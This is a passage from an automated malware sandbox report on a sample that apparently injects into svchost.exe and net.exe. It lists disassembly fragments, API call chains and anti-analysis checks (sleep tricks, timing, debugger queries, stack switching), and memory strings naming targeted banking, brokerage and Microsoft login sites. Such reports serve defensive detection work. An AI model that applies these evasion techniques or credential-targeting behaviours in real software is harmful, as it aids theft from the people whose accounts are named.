                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041933F push ss; ret 2_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405BF7 push FFFFFFE2h; iretd 2_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404BB6 push ds; iretd 2_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413CE3 push es; retf 2_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 push esp; ret 2_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AF60 push 0000007Bh; iretd 2_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0225F pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C027FA pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0283D push eax; iretd 2_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01368 push eax; iretd 2_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01065 push edi; ret 2_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C018F3 push edx; iretd 2_2_03C01906
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033F09AD push ecx; mov dword ptr [esp], ecx4_2_033F09B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_029627D4 push FFFFFFE2h; iretd 4_2_029627DA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_029708C0 push es; retf 4_2_029708EF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02980E6A push esp; retf 4_2_02980E6B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02962DBC push FFFFFF9Bh; retf 4_2_02962DBE
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02961793 push ds; iretd 4_2_02961795
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_029675FA push edi; retf 4_2_02967600
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02975B30 push esp; ret 4_2_02975D34
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02967B3D push 0000007Bh; iretd 4_2_02967B3F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0297B83A push esp; iretd 4_2_0297B85B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02975F1C push ss; ret 4_2_02975F32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03204360 push ss; retf 4_2_03204366
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Contains functionality to detect sleep reduction / modifications
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004440780_2_00444078
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeAPI/Special instruction interceptor: Address: 40E6CD4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 3359Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 6614Jump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeAPI coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860Thread sleep count: 48 > 30Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe TID: 7860Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7836Thread sleep count: 3359 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7836Thread sleep time: -6718000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7836Thread sleep count: 6614 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7836Thread sleep time: -13228000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0297C820 FindFirstFileW,FindNextFileW,FindClose,4_2_0297C820
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                Source: F14431U2a.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: discord.comVMware20,11696494690f
                Source: F14431U2a.4.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: F14431U2a.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: F14431U2a.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20U6&
                Source: F14431U2a.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: F14431U2a.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868120665.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.1871753667.000002A8037DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: F14431U2a.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: F14431U2a.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494"
                Source: F14431U2a.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: F14431U2a.4.drBinary or memory string: global block list test formVMware20,11696494690
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696494690o
                Source: F14431U2a.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: F14431U2a.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: net.exe, 00000004.00000002.3873781975.0000000007F15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,1f69
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: F14431U2a.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B93 LdrLoadDll,2_2_00417B93
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_040E6F40 mov eax, dword ptr fs:[00000030h]0_2_040E6F40
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_040E6FA0 mov eax, dword ptr fs:[00000030h]0_2_040E6FA0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_040E5920 mov eax, dword ptr fs:[00000030h]0_2_040E5920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h]2_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h]2_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h]2_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
